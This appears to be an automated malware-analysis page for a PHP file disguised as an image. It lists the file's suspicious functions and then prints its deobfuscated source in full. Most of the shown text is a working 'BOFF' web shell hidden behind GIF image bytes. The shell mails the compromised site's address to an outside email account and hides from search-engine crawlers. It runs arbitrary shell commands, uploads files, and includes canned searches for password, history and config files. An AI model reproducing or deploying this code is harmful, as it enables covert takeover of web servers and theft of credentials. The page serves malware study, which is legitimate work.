PHP Malware Analysis
yusa.php.jpeg.php
md5: f55807a3723aeea24a41d07d8e7fcbd7
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- wp@live.fr (Traces)
Encoding
- base64_decode (Deobfuscated, Original, Traces)
- base64_encode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- phpinfo (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original, Traces)
- exec (Deobfuscated, Traces)
- passthru (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- " . $_SERVER[\'HTTP_HOST\'] . " - BOFF " . BOFF_VERSION ." (Traces)
- \" . \$_SERVER['HTTP_HOST'] . \" - BOFF \" . BOFF_VERSION .\" (Deobfuscated)
URLs
- http://$web$inj (Traces)
- http://exploit-db.com/list.php?description= (Deobfuscated, Traces)
- http://localhost/uploads/yusa.php.jpeg.php (Traces)
- http://md5.rednoize.com/?q= (Deobfuscated, Traces)
- http://www.hashcrack.com/index.php (Deobfuscated, Traces)
- http://www.md5decrypter.com/ (Deobfuscated, Traces)
- http://www.milw0rm.com/cracker/search.php (Deobfuscated, Traces)
- https://hashcracking.info/index.php (Deobfuscated, Traces)
Deobfuscated PHP code
GIF89a=(��'�7IAXKgN
gYvY
x\%wh
�h�t�h%�s%�x �}9�� ��&��%��(��.��5��D��&ǚ)ǟ5ǘ;ͣ*ȡ&ղ)ׯ7<ѻ4�3��H֧KͯT��Y��q��q��F����������������������������������������������������������������������������!�
�'�!�
NETSCAPE2.0���,����=(�����pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���~������������������������������������������g���E�����������E�����B�����ȸ��D�����Ů���H��L��D٫D�B���D���T���H��G��A R�ڐ
|��
٭&��E8���kG�
A�px�a����
R2XB��E
8I���6X�:vT)��q�賥�仕F~%x� �
4#ZԉO|-4Bs��X:=
Q� ��l��yXJ�GȦ|s
h��K�3l7�B|�$'7Jީܪ����D�n=�P�
����`䌨lj���v>��5
�.69�ϸd�����nlv����f{���Pb�
�l5���p�
���
�3a�
�I�O
�����އ��Ƃ��i����#��)p�� ��{�)vm�%D~
6f�s}Ń �D�W�E�`�� ��L8x����{)
x`X/>�}m����Rؑ* |`D�=��_�^�5
!_�'a�Oڗ
7�c��`D�Cx`�
¥��Y��F����?������n@`�} lď���@4>�d
���v�xN
�י@�d��=�g�
s�G���
���ud &p8Q�)��lXD����A�H�ySun� j���k*D�LH�]
���C�J��Xb~ʪwSt�6K,��q��:9ت:���l�@�`��� �.۬�t��S�[:��=����N���{¿�A��R���6����0�_ �;������^���#���!�Ę�U���;0L1��p%
A��U̬ݵ��%霼��
���~` �G����
���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5�
���^`8E�]�.�����7 ��ȉ�j���D� z���i������!��l��w�*�D�I�nEX��� &A�Go�Qf��F��;���J���F5��Q|�X��T��y�� �]��o���C =������PB@ D��(>�C�x�`��
��JЀ�۠��p+eE0`�`A
�/NE�؆�9�@��� H�7��%B�`�l*���8 2�%� ��:�1��E��ux%nP1�!��C)�P81l�ɸF#��{����B�0>��
�b����O�3Ȗ�()yRpb��E.Z�D8�
H@%
�x+%٘�c� ���f��b�d�`F�8�XH"��-
�|1�6iI, 2���$+](A*j�
QT�o�.�U슬�ㄎ`�SN�����y�e�������b��o� �)
�y�@��3 �tT̉�&�+�L�f"�-|
����>��v��\�Q1)�@��h#aP72����$���!�
�"�,����=(��7IAXG]KgN
gYvY
xR"k\%w]'}h�t�h%�g+�s%�r.�m3�x3�x �}9��&��+��7��%��(��.��D��&ǘ;͕&ײ)4��6�K��������������������������������������������������������������������������������������������@�pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���~������������������������������������������g����E���
�������E
�´���C���Ƕ���D�ÕƷ�ʱH��M�GڬD�B���D��T����G��C�C� l&�:'�tU�6ɹ#��)�'�.6�&��Ȼ
K(8p0N�?!�2"ۈNIJX>R��O�M '��2�*��>#n��
�@�<[:�I�f����T�˘Cdb�ٓ[��E�5MBo��@�`@���tW-3 ���B���jI݅E�9[T�$��ﯧ���s��ȳ����dc�UUρ
#���ldj?��`\����u|3']�6 �S#���FKL�*N
E����$��e�YD��q�.�촁�s \-�jA
9�����-��M[�x(�s��x�|���p��
��k�T�DpE@W� ��]k�1�����Yb ���
l��*n0�癗�zBdОu�7ĉBl��-�x~|U�U�
�h�*H�� |��e"#"?vp�i�e6^��+q��m8 �#V���<F���C��^F9�#��RAGb�d�(0$k��
��'L�)B�]�e�>���
V��|���m"с�n|@�U��Ξ��pb�G�ED�����2F�I�?
>�x�
��
���%��j��ꄯ<�a�9ij�2�D��&��Z`��]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ޘ�N���>PAD�HD�枫�n��}�#˒�
Q��S���
2�X�{�k�lQ�2�����w�|2�
h���G�,m���3��6-��E�L��I�³*K���q�`
DwV�QX���pe���� q��T�������u��
<�a�*At� lmE�
�
��N[P1�ۦ��$��@`��Dpy�
yXvCAy�B`�D� 0QwG#�
�[^� $���Ǧ{�L��[��K�g�;�S~��GX.�goT.����������?1z����:�g�|�<O��!��{�E �{�V���C
�{��go���'��zEH�rJ�=�5��
�鲥���4��дV w���$xVA.�+��'�E��E�^������84`K�>L�
�������0�]P�^p F<"��?!,�N4��P� �����:T�@h��%t�:�-��I<`��p�I�.)^�40D#p@�j4��:��1��r��F2oW�#Z�;$Q q�
� �K��Nl#
29�!�F@�Bh�
ᏀL!�XF�LH�Kh�.�hE&J� G��<�WN!���ڈY�@
��>��19J"�2,/
&.GXB%�R�9B6�W]����W��I�$��ӌE8Y� ����A5��Q.a�B�&ة�J��! �t)K%t�-�JF
b�NMxL�)�R�Й����6�O!TH̄H� � ��!�
�)�,����=(��AXKgN
gYvY
xR"k\%wh
�h�h%�g+�s%�r.�x3�x �}9��&��+��,��7��%��(��.��5��&ǚ)ǘ;͕&ף*Ȳ)ׯ74�3��6�H֧KͻH�T��Y��q��h�������������������������������������������������������������������������pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���~������������������������������������������g���
E$�����
�
����$E$�Õ��D� � �����̌��C����E
��H�M��G�D�
�B��ϾD��a��1r��Ӑ�� �o��zU!L�
C'�yW
�UGt����ll�0���uG�)A�s[��x�
�xO%��X2�
P�n�R/�њH�e+�Dm?#
��ǣ6�8�J���Di�M�ք�j����5o
Q7�-
<�
*�l�ӌ2r/a!l)d��A��
E���͆��
;֘c��%߂�و�b���pe~C"B���H�eF2��8qb�t_`ur�e�
w�
u3��Pv�h�"�`�Íx�LĹ��3�
�~ֺ������MDfJ�
��۵�W�%����X �)�@�ћE��w�u�Sxb8
y\mÖz���Zb�E��L��w!y(>��w�=� |��s�d
�C�W)H�cC$�L��7�r.�\{)@�`
@ �X�$PD��
`�aG:��O�72E
�amn]�"�c�xь� &dR8`g��iٟLR!�P
�d� 䡓���T���i�|�_
��Qi�#��g����noM�
�V
�)p����W��=�e�k��j����1߲s�x�W�j�l |0��B0�,�\j۴�6���C
��W��|�ً���zĸV�{�;��n��V�m�I��.��PN�
�����C��+��By�ѾHŸ����
7�Y�FTk�SaoaY$D� ����29R�kt���
�f����:��Sp�3�I��DZ���9��g��u�*3)O���[_hv
,���Et
��BH�
�[��64M@�S�M7d�l5-��U܍��zߌ3Ԁ3��
����P�5�g�
�ژkN�݅
0�j4��밓#{��3S�2�K�'ợl���2K{� {۶?�m�I�nE�='���^���_�=���#O���'���o..�Y�n��C�O��a��K�o,���b�����{�C�ڗ
"��{�K ��w���Ozdը�:$ �
��v�] A#� �����z)Rx����d``�w-�y�f�K!
��|��P���=�`�(f���'Pa
��BJa%��f��%��}F����6>��G"��=�!o��^FP�ةQ��C��`(��\�ݮ
��$<��n@dĠE#��U�I�!� �#l���`k���'Rr��Z�NB�MF
�[�+��Ɉ-�wj���8�r
�
,V�h�"�|��=�G_�љE��0i*%̲��da0mV�k�)�;�&6p>�jK
���#
�D�:�c?:R Ӭf��I-̓��<�=���7�3���c2�W ,��8(T�P�F¡Jh�"���;<?php
/* <<Mr.HarchaLi>> Q@Live.Ma*/
eval("?> <?php \r\n\r\n \$web = \$_SERVER[\"HTTP_HOST\"];\r\n \$inj = \$_SERVER[\"REQUEST_URI\"];\r\n \$body = \"Egy_Spider \\nUserName: \".htmlspecialchars(\$tacfgd['uname']) .\"\\nPassWord:\r\n\".htmlspecialchars(\$tacfgd['pword']).\"\\nMessage:\\n\".\"\\nE-server: \".htmlspecialchars\r\n(\$_SERVER['REQUEST_URI']).\"\\nE-server2: \".htmlspecialchars (\$_SERVER[\"SERVER_NAME\"]).\"\\n\\nIP: \r\n\";\r\n mail(\"wp@live.fr\",\"Shell http://\$web\$inj\", \"\$body\");\r\n# Web Shell by boff\r\n\$auth_pass = \"\";\r\n\$color = \"#df5\";\r\n\$default_action = 'FilesMan';\r\n\$default_use_ajax = true;\r\n\$default_charset = 'Windows-1251';\r\n\r\nif(!empty(\$_SERVER['HTTP_USER_AGENT'])) {\r\n \$userAgents = array(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\");\r\n if(preg_match('/' . implode('|', \$userAgents) . '/i', \$_SERVER['HTTP_USER_AGENT'])) {\r\n header('HTTP/1.0 404 Not Found');\r\n exit;\r\n }\r\n}\r\n\r\n@session_start();\r\n@ini_set('error_log',NULL);\r\n@ini_set('log_errors',0);\r\n@ini_set('max_execution_time',0);\r\n@set_time_limit(0);\r\n@set_magic_quotes_runtime(0);\r\n@define('BOFF_VERSION', '1.0');\r\n\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction BOFFstripslashes(\$array) {\r\n\t\treturn is_array(\$array) ? array_map('BOFFstripslashes', \$array) : stripslashes(\$array);\r\n\t}\r\n\t\$_POST = BOFFstripslashes(\$_POST);\r\n}\r\n\r\nfunction BOFFLogin() {\r\n\tdie(\"<pre align=center><b>Authorization</b><br>\xdf0ff \\/\\/3\xdf \$|-|311 1.0<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>\");\r\n}\r\n\r\nif(!isset(\$_SESSION[md5(\$_SERVER['HTTP_HOST'])]))\r\n\tif( empty(\$auth_pass) || ( isset(\$_POST['pass']) && (md5(\$_POST['pass']) == \$auth_pass) ) )\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST'])] = true;\r\n\telse\r\n\t\tBOFFLogin();\r\n\r\nif(strtolower(substr(PHP_OS,0,3)) == \"win\")\r\n\t\$os = 'win';\r\nelse\r\n\t\$os = 'nix';\r\n\r\n\$safe_mode = @ini_get('safe_mode');\r\nif(!\$safe_mode)\r\n error_reporting(0);\r\n\r\n\$disable_functions = @ini_get('disable_functions');\r\n\$home_cwd = @getcwd();\r\nif(isset(\$_POST['c']))\r\n\t@chdir(\$_POST['c']);\r\n\$cwd = @getcwd();\r\nif(\$os == 'win') {\r\n\t\$home_cwd = str_replace(\"\\\\\", \"/\", \$home_cwd);\r\n\t\$cwd = str_replace(\"\\\\\", \"/\", \$cwd);\r\n}\r\nif( \$cwd[strlen(\$cwd)-1] != '/' )\r\n\t\$cwd .= '/';\r\n\r\nif(!isset(\$_SESSION[md5(\$_SERVER['HTTP_HOST']) . 'ajax']))\r\n \$_SESSION[md5(\$_SERVER['HTTP_HOST']) . 'ajax'] = (bool)\$GLOBALS['default_use_ajax'];\r\n\t\r\nif(\$os == 'win')\r\n\t\$aliases = array(\r\n\t\t\"List Directory\" => \"dir\",\r\n \t\"Find index.php in current dir\" => \"dir /s /w /b index.php\",\r\n \t\"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\",\r\n \t\"Show active connections\" => \"netstat -an\",\r\n \t\"Show running services\" => \"net start\",\r\n \t\"User accounts\" => \"net user\",\r\n \t\"Show computers\" => \"net view\",\r\n\t\t\"ARP Table\" => \"arp -a\",\r\n\t\t\"IP Configuration\" => \"ipconfig /all\"\r\n\t);\r\nelse\r\n\t\$aliases = array(\r\n \t\t\"List dir\" => \"ls -lha\",\r\n\t\t\"list file attributes on a Linux second extended file system\" => \"lsattr -va\",\r\n \t\t\"show opened ports\" => \"netstat -an | grep -i listen\",\r\n \"process status\" => \"ps aux\",\r\n\t\t\"Find\" => \"\",\r\n \t\t\"find all suid files\" => \"find / -type f -perm -04000 -ls\",\r\n \t\t\"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\",\r\n \t\t\"find all sgid files\" => \"find / -type f -perm -02000 -ls\",\r\n \t\t\"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\",\r\n \t\t\"find config.inc.php files\" => \"find / -type f -name config.inc.php\",\r\n \t\t\"find config* files\" => \"find / -type f -name \\\"config*\\\"\",\r\n \t\t\"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\",\r\n \t\t\"find all writable folders and files\" => \"find / -perm -2 -ls\",\r\n \t\t\"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\",\r\n \t\t\"find all service.pwd files\" => \"find / -type f -name service.pwd\",\r\n \t\t\"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\",\r\n \t\t\"find all .htpasswd files\" => \"find / -type f -name .htpasswd\",\r\n \t\t\"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\",\r\n \t\t\"find all .bash_history files\" => \"find / -type f -name .bash_history\",\r\n \t\t\"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\",\r\n \t\t\"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\",\r\n \t\t\"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\",\r\n\t\t\"Locate\" => \"\",\r\n \t\t\"locate httpd.conf files\" => \"locate httpd.conf\",\r\n\t\t\"locate vhosts.conf files\" => \"locate vhosts.conf\",\r\n\t\t\"locate proftpd.conf files\" => \"locate proftpd.conf\",\r\n\t\t\"locate psybnc.conf files\" => \"locate psybnc.conf\",\r\n\t\t\"locate my.conf files\" => \"locate my.conf\",\r\n\t\t\"locate admin.php files\" =>\"locate admin.php\",\r\n\t\t\"locate cfg.php files\" => \"locate cfg.php\",\r\n\t\t\"locate conf.php files\" => \"locate conf.php\",\r\n\t\t\"locate config.dat files\" => \"locate config.dat\",\r\n\t\t\"locate config.php files\" => \"locate config.php\",\r\n\t\t\"locate config.inc files\" => \"locate config.inc\",\r\n\t\t\"locate config.inc.php\" => \"locate config.inc.php\",\r\n\t\t\"locate config.default.php files\" => \"locate config.default.php\",\r\n\t\t\"locate config* files \" => \"locate config\",\r\n\t\t\"locate .conf files\"=>\"locate '.conf'\",\r\n\t\t\"locate .pwd files\" => \"locate '.pwd'\",\r\n\t\t\"locate .sql files\" => \"locate '.sql'\",\r\n\t\t\"locate .htpasswd files\" => \"locate '.htpasswd'\",\r\n\t\t\"locate .bash_history files\" => \"locate '.bash_history'\",\r\n\t\t\"locate .mysql_history files\" => \"locate '.mysql_history'\",\r\n\t\t\"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\",\r\n\t\t\"locate backup files\" => \"locate backup\",\r\n\t\t\"locate dump files\" => \"locate dump\",\r\n\t\t\"locate priv files\" => \"locate priv\"\t\r\n\t);\r\n\r\nfunction BOFFHeader() {\r\n\tif(empty(\$_POST['charset']))\r\n\t\t\$_POST['charset'] = \$GLOBALS['default_charset'];\r\n\tglobal \$color;\r\n\techo \"<html><head><meta http-equiv='Content-Type' content='text/html; charset=\" . \$_POST['charset'] . \"'><title>\" . \$_SERVER['HTTP_HOST'] . \" - BOFF \" . BOFF_VERSION .\"</title>\r\n<style>\r\nbody{background-color:#000028;color:#e1e1e1;}\r\nbody,td,th{ border:1px outset black;font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ border-left:5px solid #df5;color:#fff;background-color:#000028; }\r\nspan,h1,a{ color: #df5 !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:7px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#000028;margin:0px; }\r\ndiv.content{ padding: 7px;margin-left:7px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:250px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#003300;}\r\n.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '\" . htmlspecialchars(\$GLOBALS['cwd']) . \"';\r\n var a_ = '\" . htmlspecialchars(@\$_POST['a']) .\"'\r\n var charset_ = '\" . htmlspecialchars(@\$_POST['charset']) .\"';\r\n var p1_ = '\" . ((strpos(@\$_POST['p1'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p1'],ENT_QUOTES)) .\"';\r\n var p2_ = '\" . ((strpos(@\$_POST['p2'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p2'],ENT_QUOTES)) .\"';\r\n var p3_ = '\" . ((strpos(@\$_POST['p3'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p3'],ENT_QUOTES)) .\"';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('\" . addslashes(\$_SERVER['REQUEST_URI']) .\"', params);\r\n\t}\r\n\tfunction sr(url, params) {\t\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>\";\r\n\t\$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\r\n\t\$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\r\n\t\$totalSpace = \$totalSpace?\$totalSpace:1;\r\n\t\$release = @php_uname('r');\r\n\t\$kernel = @php_uname('s');\r\n\t\$explink = 'http://exploit-db.com/list.php?description=';\r\n\tif(strpos('Linux', \$kernel) !== false)\r\n\t\t\$explink .= urlencode('Linux Kernel ' . substr(\$release,0,6));\r\n\telse\r\n\t\t\$explink .= urlencode(\$kernel . ' ' . substr(\$release,0,3));\r\n\tif(!function_exists('posix_getegid')) {\r\n\t\t\$user = @get_current_user();\r\n\t\t\$uid = @getmyuid();\r\n\t\t\$gid = @getmygid();\r\n\t\t\$group = \"?\";\r\n\t} else {\r\n\t\t\$uid = @posix_getpwuid(posix_geteuid());\r\n\t\t\$gid = @posix_getgrgid(posix_getegid());\r\n\t\t\$user = \$uid['name'];\r\n\t\t\$uid = \$uid['uid'];\r\n\t\t\$group = \$gid['name'];\r\n\t\t\$gid = \$gid['gid'];\r\n\t}\r\n\r\n\t\$cwd_links = '';\r\n\t\$path = explode(\"/\", \$GLOBALS['cwd']);\r\n\t\$n=count(\$path);\r\n\tfor(\$i=0; \$i<\$n-1; \$i++) {\r\n\t\t\$cwd_links .= \"<a href='#' onclick='g(\\\"FilesMan\\\",\\\"\";\r\n\t\tfor(\$j=0; \$j<=\$i; \$j++)\r\n\t\t\t\$cwd_links .= \$path[\$j].'/';\r\n\t\t\$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\r\n\t}\r\n\r\n\t\$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');\r\n\t\$opt_charsets = '';\r\n\tforeach(\$charsets as \$item)\r\n\t\t\$opt_charsets .= '<option value=\"'.\$item.'\" '.(\$_POST['charset']==\$item?'selected':'').'>'.\$item.'</option>';\r\n\r\n\t\$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');\r\n\tif(!empty(\$GLOBALS['auth_pass']))\r\n\t\t\$m['Logout'] = 'Logout';\r\n\t\$m['Self remove'] = 'SelfRemove';\r\n\t\$menu = '';\r\n\tforeach(\$m as \$k => \$v)\r\n\t\t\$menu .= '<th width=\"'.(int)(100/count(\$m)).'%\">[ <a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a> ]</th>';\r\n\r\n\t\$drives = \"\";\r\n\tif(\$GLOBALS['os'] == 'win') {\r\n\t\tforeach(range('c','z') as \$drive)\r\n\t\tif(is_dir(\$drive.':\\\\'))\r\n\t\t\t\$drives .= '<a href=\"#\" onclick=\"g(\\'FilesMan\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\r\n\t}\r\n\techo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . (\$GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'\r\n . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href=\"' . \$explink . '\" target=_blank>[exploit-db.com]</a></nobr><br>' . \$uid . ' ( ' . \$user . ' ) <span>Group:</span> ' . \$gid . ' ( ' . \$group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . (\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')\r\n . ' <a href=# onclick=\"g(\\'Php\\',null,\\'\\',\\'info\\')\">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . BOFFViewSize(\$totalSpace) . ' <span>Free:</span> ' . BOFFViewSize(\$freeSpace) . ' ('. (int) (\$freeSpace/\$totalSpace*100) . '%)<br>' . \$cwd_links . ' '. BOFFPermsColor(\$GLOBALS['cwd']) . ' <a href=# onclick=\"g(\\'FilesMan\\',\\'' . \$GLOBALS['home_cwd'] . '\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a><br>' . \$drives . '</td>'\r\n . '<td width=1 align=right><nobr><select onchange=\"g(null,null,null,null,null,this.value)\"><optgroup label=\"Page charset\">' . \$opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @\$_SERVER[\"SERVER_ADDR\"] . '<br><span>Client IP:</span><br>' . \$_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'\r\n . '<table style=\"border-top:2px solid #333;\" cellpadding=3 cellspacing=0 width=100%><tr>' . \$menu . '</tr></table><div style=\"margin:5\">';\r\n}\r\n\r\nfunction BOFFFooter() {\r\n\t\$is_writable = is_writable(\$GLOBALS['cwd'])?\" <font color='#25ff00'>(Writeable)</font>\":\" <font color=red>(Not writable)</font>\";\r\n echo \"\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\r\n\t<tr>\r\n\t\t<td><form onsubmit='g(null,this.c.value,\\\"\\\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\\\"g('FilesTools',null,this.f.value);return false;\\\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\\"g('FilesMan',null,'mkdir',this.d.value);return false;\\\"><span>Make dir:</span>\$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>\r\n\t\t<td><form onsubmit=\\\"g('FilesTools',null,this.f.value,'mkfile');return false;\\\"><span>Make file:</span>\$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\\"g('Console',null,this.c.value);return false;\\\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>\r\n\t\t<td><form method='post' ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMAn'>\r\n\t\t<input type=hidden name=c value='\" . \$GLOBALS['cwd'] .\"'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=charset value='\" . (isset(\$_POST['charset'])?\$_POST['charset']:'') . \"'>\r\n\t\t<span>Upload file:</span>\$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>\r\n\t</tr></table></div></body></html>\";\r\n}\r\n\r\nif (!function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {\r\n function posix_getpwuid(\$p) {return false;} }\r\nif (!function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {\r\n function posix_getgrgid(\$p) {return false;} }\r\n\r\nfunction BOFFEx(\$in) {\r\n\t\$out = '';\r\n\tif (function_exists('exec')) {\r\n\t\t@exec(\$in,\$out);\r\n\t\t\$out = @join(\"\\n\",\$out);\r\n\t} elseif (function_exists('passthru')) {\r\n\t\tob_start();\r\n\t\t@passthru(\$in);\r\n\t\t\$out = ob_get_clean();\r\n\t} elseif (function_exists('system')) {\r\n\t\tob_start();\r\n\t\t@system(\$in);\r\n\t\t\$out = ob_get_clean();\r\n\t} elseif (function_exists('shell_exec')) {\r\n\t\t\$out = shell_exec(\$in);\r\n\t} elseif (is_resource(\$f = @popen(\$in,\"r\"))) {\r\n\t\t\$out = \"\";\r\n\t\twhile(!@feof(\$f))\r\n\t\t\t\$out .= fread(\$f,1024);\r\n\t\tpclose(\$f);\r\n\t}\r\n\treturn \$out;\r\n}\r\nfunction BOFFViewSize(\$s) {\r\n\tif(\$s >= 1073741824)\r\n\t\treturn sprintf('%1.2f', \$s / 1073741824 ). ' GB';\r\n\telseif(\$s >= 1048576)\r\n\t\treturn sprintf('%1.2f', \$s / 1048576 ) . ' MB';\r\n\telseif(\$s >= 1024)\r\n\t\treturn sprintf('%1.2f', \$s / 1024 ) . ' KB';\r\n\telse\r\n\t\treturn \$s . ' B';\r\n}\r\n\r\nfunction BOFFPerms(\$p) {\r\n\tif ((\$p & 0xC000) == 0xC000)\$i = 's';\r\n\telseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\r\n\telseif ((\$p & 0x8000) == 0x8000)\$i = '-';\r\n\telseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\r\n\telseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\r\n\telseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\r\n\telseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\r\n\telse \$i = 'u';\r\n\t\$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n\t\$i .= ((\$p & 0x0080) ? 'w' : '-');\r\n\t\$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\r\n\t\$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n\t\$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n\t\$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\r\n\t\$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n\t\$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n\t\$i 